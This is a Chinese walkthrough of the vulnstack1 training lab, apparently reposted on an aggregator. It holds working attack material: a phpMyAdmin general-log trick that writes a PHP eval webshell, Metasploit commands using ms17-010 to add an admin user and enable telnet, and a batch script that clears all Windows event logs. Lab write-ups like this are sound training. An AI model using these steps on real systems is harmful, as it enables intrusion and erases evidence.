【红日靶场】vulnstack1-完整渗透过程

目录

  • 下载地址
  • 红日靶场
  • 基本环境配置
  • 攻击思维导图
    • 网络结构
  • 系统环境配置
  • 外网打点
    • 对phpmyadmin渗透
    • 对zzcms的渗透:
      • getshell失败案例
      • getshell成功案例
        • 模版制作:
        • 应用导入上传:
        • 其他方式:
  • 内网渗透
    • 信息收集
    • msf上线:
    • 搭建隧道
    • 内网探测
    • 上线cs横向移动(成功)
    • msf横向尝试(失败了)
    • 换了ms17-010命令执行poc
    • ftp匿名登录(失败)
    • 痕迹清理bat
    • 参考链接:

下载地址

下载地址

红日靶场

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019:

一、环境搭建
1.环境搭建测试
2.信息收集

二、漏洞利用
3.漏洞搜索与利用
4.后台Getshell上传技巧
5.系统信息收集
6.主机密码收集

三、内网搜集
7.内网–继续信息收集
8.内网攻击姿势–信息泄露
9.内网攻击姿势-MS08-067
10.内网攻击姿势-SMB远程桌面口令猜测
11.内网攻击姿势-Oracle数据库TNS服务漏洞
12.内网攻击姿势-RPC DCOM服务漏洞

四、横向移动
13.内网其它主机端口-文件读取
14.内网其它主机端口-redis
15.内网其它主机端口-redis Getshell
16.内网其它主机端口-MySQL数据库
17.内网其它主机端口-MySQL提权

五、构建通道
18.内网其它主机端口-代理转发

六、持久控制
19.域渗透-域成员信息收集
20.域渗透-基础服务弱口令探测及深度利用之powershell
21.域渗透-横向移动[wmi利用]
22.域渗透-C2命令执行
23.域渗透-利用DomainFronting实现对beacon的深度隐藏
24.域渗透-域控实现与利用

七、痕迹清理
25、日志清理

基本环境配置

在这里插入图片描述

攻击思维导图

在这里插入图片描述

网络结构

主机IP网卡
Kali Linux192.168.200.*NAT
Windwos7192.168.200.* /192.168.52.*NAT/VMnet2
Win2k3192.168.52.*VMnet2(仅主机)
Windows192.168.52.*VMnet2(仅主机)

备注:按照自己喜好,可以设置NAT网卡和vmnet仅主机模式都行,因为windows7只要主机能够通信就行。
添加一个vmnet2网卡仅主机模式用于内网域环境通信:
在这里插入图片描述

点击应用保存

系统环境配置

windwos7使用双网卡:
我这已经添加:
在这里插入图片描述
启动靶机windows7
密码:hongrisec@2019
在这里插入图片描述
在这里插入图片描述
启动其他两台域控制器环境:
测试通信
在这里插入图片描述
查看域控制器环境
在这里插入图片描述
ping:注意这里不能pingwindows7(禁ping)
在这里插入图片描述

启动windows7 的web环境
在这里插入图片描述
关闭防火墙或者开放80端口:
在这里插入图片描述

到这里就可以开始渗透测试了

外网打点

目标:192.168.200.128
直接扫全端口:
在这里插入图片描述
还有永恒之蓝,如果防火墙开启应该就没有了。
在这里插入图片描述

发现80和3306端口开放
访问网站:发现phpstudy探针,系统为windows7
这里看到www目录的文件位置
在这里插入图片描述
扫描一下目录:
在这里插入图片描述
一些敏感文件:
在这里插入图片描述
phpmyadmin的版本
在这里插入图片描述

在这里插入图片描述

对phpmyadmin渗透

测试弱密码:
root
root
在这里插入图片描述
没想到这么简单就进来了

因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003
这里用常用方法getshell:https://www.freebuf.com/articles/web/226240.html
在这里插入图片描述
收集到信息:
在这里插入图片描述

 show variables like '%general%';general_log:日志保存状态(这里为off)
general_log_file:日志保存路径

在这里插入图片描述
开启日志保存并配置保存路径

 set global general_log = "ON"; set global general_log_file = "C:/phpStudy/WWW/log.php";select '<?php eval($_POST[pwd]); ?>';

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
打开蚁剑连接:

在这里插入图片描述
在这里插入图片描述

对zzcms的渗透:

在这里插入图片描述
访问一下:
在这里插入图片描述
尝试注册功能:
在这里插入图片描述
成功:

在这里插入图片描述
查找上传点:
在这里插入图片描述
测试一下上传:
在这里插入图片描述
先测试一下:
在这里插入图片描述
上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点
在这里插入图片描述

没注意这里:
在这里插入图片描述

在这里插入图片描述

这里提示我们后台位置和账户密码大概漏洞存在与后台,可能作者是想让我们从cms上进行拿shell,这里也可将备份文件下载到本地进行代码审计

getshell失败案例

寻找上传点:
在这里插入图片描述
图集上传点:

在这里插入图片描述

在这里插入图片描述

寻找上传文件位置:没找到在这里插入图片描述

getshell成功案例

模版制作:

模版文件这好像可以直接添加php文件:
在这里插入图片描述
在这里插入图片描述
文件里面找到:
在这里插入图片描述
在这里插入图片描述

应用导入上传:

在这里插入图片描述
虽然我们不知道cms的应用怎么写的直接上传一个shell.php文件:
在这里插入图片描述

在这里插入图片描述
打包换个名字上传:

在这里插入图片描述

在这里插入图片描述
把member模块停用,启用test:
在这里插入图片描述

寻找上传文件:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

连接测试:
这里我写错马了重新上传了一个test1连接:
在这里插入图片描述

其他方式:

可以通过3306登录获取shell,我们在下载模板文件时可以看到数据库的用户名密码:
这里没有进行测试
在这里插入图片描述
大家有兴趣可以尝试获取,也可以通过网上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。

内网渗透

传个fscan扫一扫:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

信息收集

判断主机是否加入域

方法一:
net time /domain 
#如果当前主机处于工作组中未加入域,则显示找不到域控制器
#加入了域,且当前用户为本地用户包括本地管理员,则显示拒绝访问
加入了域,且当前用户域用户,则显示域控的时间

在这里插入图片描述

方法二:
net config workstation
#如果命令返回信息中包含“工作站域”,则说明该计算机已经加入了域。

在这里插入图片描述
在这里插入图片描述
看下网段:发现内网网段
在这里插入图片描述

方法三:
echo %userdomain%

在这里插入图片描述

这里可以看一下windows7使用杀软没:
在这里插入图片描述
没有识别到杀软,可以做msf上线或者做内网穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。

msf上线:

生成msf马:
在这里插入图片描述

kali监听:
在这里插入图片描述
上传马:
在这里插入图片描述
执行:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
提权:getsystem
在这里插入图片描述

搭建隧道

background
使用sockes模块:
use auxiliary/server/socks_proxy
set srvport 1050
run

在这里插入图片描述
配置:
vim /etc/proxychains4.conf
添加:
在这里插入图片描述

内网探测

使用nmap探测一下:存在防火墙

proxychains  nmap -PN --script smb-vuln* -p139,445 192.168.52.138
proxychains  nmap -PN --script smb-vuln* -p139,445 192.168.52.141

在这里插入图片描述
在这里插入图片描述

上线cs横向移动(成功)

生成cs马:
在这里插入图片描述

上传运行:
在这里插入图片描述
提权:
在这里插入图片描述
探测:
在这里插入图片描述
抓取明文密码:这里我密码改了就不放出来了
在这里插入图片描述
添加smb的监听,因为我们拿到内网的一台权限了,使用这台上面的权限横向到其他两台上:
添加监听:
在这里插入图片描述
在这里插入图片描述
选择win7和我们加的监听:
、

在这里插入图片描述
另一台同样操作:成功获取内网权限

在这里插入图片描述

msf横向尝试(失败了)

代理后直接可以横向移动:
上面fscna探测出网段存在ms17-010直接利用:

利用失败了:
怀疑是防火墙拦截了(后面关了防火墙也不行)
在这里插入图片描述
我这想用msf上线,前面msf上线失败了因为kali的sock5代理有点问题我这用cs的代理:

在这里插入图片描述
使用kali做socks4的代理

换了ms17-010命令执行poc

使用ms17-010命令执行poc:

//这里直接创建用户julien密码julien@123
use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.138
set COMMAND net user julien julien@123
run
//将hack用户添加到管理员组
set COMMAND net localgroup administrators julien /add
run
set COMMAND sc config tlntsvr start= auto
run
set COMMAND net start telnet
run
set COMMAND netstat -an
run

发现138这台23端口无法打开命令执行有问题,换成141这台远程是可以的但是一直提示我密码错误:不知道什么原因
在这里插入图片描述

ftp匿名登录(失败)

use auxiliary/scanner/ftp/anonymous
set rhosts  192.168.52.141
run

在这里插入图片描述
不存在后面版本:
但不能写入本次渗透就做到这里
在这里插入图片描述

痕迹清理bat

这里不在操作

@echo off
mode con cols=40 lines=7
color 89
title 自动清理日志
:up
echo  清理中 请稍等...
FOR /F "delims=" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%%I") 
cls 
for /L %%a in (10,-1,0
) do (
echo ----------------------------------------
echo  每10分钟清理一次
echo ----------------------------------------
echo  %%a 分钟后开始清理
echo ----------------------------------------
ping -n 60 localhost 1>nul 2>nul
cls
)
goto up

参考链接:

https://www.freebuf.com/articles/web/324441.html
https://www.freebuf.com/articles/web/226240.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/88193.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

LeetCode刷题

一 螺旋矩阵 题目链接&#xff1a;59. 螺旋矩阵 II - 力扣&#xff08;LeetCode&#xff09; 题目描述&#xff1a; 给你一个正整数 n &#xff0c;生成一个包含 1 到 n2 所有元素&#xff0c;且元素按顺时针顺序螺旋排列的 n x n 正方形矩阵 matrix 。 示例 1&#xff1a;…

算法基础之归并排序

一、归并排序的形象理解 原题链接 示例代码 void merge_sort(int q[], int l, int r) {if (l > r) return;int mid l r >> 1;merge_sort(q, l, mid), merge_sort(q, mid 1, r);int k 0, i l, j mid 1;while (i < mid && j < r) //第一处if (q[i]…

计算机类软件方向适合参加的比赛

前言 博主是一名计算机专业的大三学生&#xff0c;在校时候参加了很多比赛和训练营&#xff0c;现在给大家博主参加过的几个的比赛&#xff0c;希望能给大一大二的学生提供一点建议。 正文 最近也有比赛的&#xff0c;我会从时间线上来给大家推荐一些比赛&#xff0c;并且给…

C/C++程序,从命令行传入参数

C/C中如何让程序接受并处理命令行参数_c 命令行接收--version_饼干叔叔海洋的博客-CSDN博客 #include <stdio.h> #include <stdlib.h>//argc&#xff1a;argument count //argv: arguments vector,参数向量。 //33 777 103 int main(int argc, char **argv){ //…

工地临时用电之智慧用电:全方位保障用电安全

随着科技进步和智能化的发展&#xff0c;工地用电管理也迎来了智慧化的革新。智慧用电&#xff0c;作为智慧工地的重要组成部分&#xff0c;通过集中式管理和创新的技术手段&#xff0c;为工地提供了全方位的用电安全保障。 针对工地临时用 的现状及系统结构&#xff0c;力安科…

Docker 部署前端项目(非自动化)

部署前端项目 1. nginx配置文件1.1 nginxConf 2. 创建容器2.1 添加项目2.2 下载项目依赖2.3 打包前端项目2.4 创建容器2.5 查看容器 3. 视频演示4. 注意 1. nginx配置文件 1.1 nginxConf 首先你需要有nginx配置文件&#xff0c;你可以执行以下命令获取配置文件 # 安装镜像-生成…

babel的配置执行顺序

babel配置文件&#xff1a; //.babelrc {"presets": ["babel/preset-env","babel/preset-react"],"plugins": ["babel/plugin-proposal-class-properties",["babel/plugin-transform-runtime",{"corejs&quo…

计算机专业毕业设计项目推荐09-个人医疗系统(Spring+Js+Mysql)

个人医疗系统&#xff08;SpringJsMysql&#xff09; **介绍****系统总体开发情况-功能模块****各部分模块实现** 介绍 本系列(后期可能博主会统一为专栏)博文献给即将毕业的计算机专业同学们,因为博主自身本科和硕士也是科班出生,所以也比较了解计算机专业的毕业设计流程以及…

智慧公厕自动化保洁系统,让公共厕所实现7*24 持续整洁

随着科技的不断进步&#xff0c;越来越多的创新方案应用于各个领域&#xff0c;公共厕所的智慧化也不例外。本文重点介绍智慧公厕源头厂家广州中期科技有限公司&#xff0c;大量案例项目中所使用的智慧公厕自动化保洁系统&#xff0c;能有效地节省人力&#xff0c;并保持公共厕…

网络安全,weblogic漏洞复现

WebLogic是美国Oracle公司出品的一个Java应用服务器&#xff0c;是一个基于JAVAEE架构的中间件&#xff0c;用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用。 2|0弱口令登陆部署shell文件 App Weblogic Path weblogic/weak_password 2|1介绍 用户管理…

广东电信和中兴开通首个50G PON万兆入企啦!

最近广东电信和中兴在深圳市南山科技园成功开通了首个50G PON万兆入企应用&#xff0c;双方将携手打造50G PON万兆入企的示范应用样板工程和产业园区&#xff0c;看来“万兆入企&#xff0c;助力深圳打造全球数字先锋城市”的目标是指日可待了。 深圳在2022年发布了《深圳市推进…

数据库管理工具DBeaverUltimate mac中文高级功能

DBeaver Ultimate mac是一款数据库管理工具&#xff0c;支持多种数据库&#xff0c;包括MySQL、Oracle、PostgreSQL、SQLite、Microsoft SQL Server等。它提供了一个直观的用户界面&#xff0c;使用户可以轻松地管理和查询数据库&#xff0c;包括创建和修改表、执行SQL查询、导…

面试官的几句话,差点让我挂在HTTPS上

♥ 前 言 作为软件测试&#xff0c;大家都知道一些常用的网络协议是我们必须要了解和掌握的&#xff0c;比如 HTTP 协议&#xff0c;HTTPS 协议就是两个使用非常广泛的协议&#xff0c;所以也是面试官问的面试的时候问的比较多的两个协议&#xff1b;而且因为这两个协议有相…

如何使用php提取文章中的关键词?PHP使用Analysis中英文分词提取关键词

1、下载Analysis&#xff0c;创建test.php测试 2、引入Analysis实现中文分词 <?php include "./Analysis/Analysis.php";$annew \WordAnalysis\Analysis(); $content"机器学习是一门重要的技术&#xff0c;可以用于数据分析和模式识别。"; //10分词数…

Goby 漏洞发布|Revive Adserver 广告管理系统 adxmlrpc.php 文件远程代码执行漏洞(CVE-2019-5434)

漏洞名称&#xff1a;Revive Adserver 广告管理系统 adxmlrpc.php 文件远程代码执行漏洞&#xff08;CVE-2019-5434&#xff09; English Name&#xff1a; Revive Adserver adxmlrpc.php Remote Code Execution Vulnerability (CVE-2019-5434) CVSS core: 9.0 影响资产数&a…

配置pytorchGPU虚拟环境-python3.7

cuda版本的pytorch包下载地址戳这里 winR->输入cmd->输nvcc -V回车 cuda 11.0 输入以下命令来查找 CUDA 的安装路径&#xff1a; Windows: where nvcc 输入以下命令来查找 cuDNN 的版本号&#xff1a; Windows: where cudnn* cuDNN 8.0 本机安装的是cuda 11.0&…

MySQL - 关于约束类型和作用的介绍

约束的概念&#xff1a;约束是作用于表中字段上的规则&#xff0c;用于限制存储在表中的数据。 约束的作用&#xff1a;用于保证数据库中数据的正确性、完整性和一致性。 约束分类&#xff1a; 约束类型作用关键字非空约束限制该字段的数据不能为nullnot null唯一约束保证该…

【深度学习-第3篇】使用MATLAB快速实现CNN分类(模式识别)任务,含一维、二维、三维数据演示案例

在本文中&#xff0c;我们将介绍如何使用 MATLAB 中的 Convolutional Neural Network&#xff08;CNN&#xff09;进行分类任务。我们将使用 MATLAB 的 Deep Learning Toolbox 来创建、训练和评估 CNN。 一、一个简单的案例 1 安装和准备 首先&#xff0c;确保已安装 MATLAB…

基于SSM的高校图书馆个性化服务的设计与实现(有报告)。Javaee项目。

演示视频&#xff1a; 基于SSM的高校图书馆个性化服务的设计与实现&#xff08;有报告&#xff09;。Javaee项目。 项目介绍&#xff1a; 采用M&#xff08;model&#xff09;V&#xff08;view&#xff09;C&#xff08;controller&#xff09;三层体系结构&#xff0c;通过S…

HarmonyOS 4.0 实况窗上线!支付宝实现医疗场景智能提醒

本文转载自支付宝体验科技&#xff0c;作者是蚂蚁集团客户端工程师博欢&#xff0c;介绍了支付宝如何基于 HarmonyOS 4.0 实况窗实现医疗场景履约智能提醒。 1.话题背景 8 月 4 日&#xff0c;华为在 HDC&#xff08;华为 2023 开发者大会&#xff09;上推出了新版本操作系统…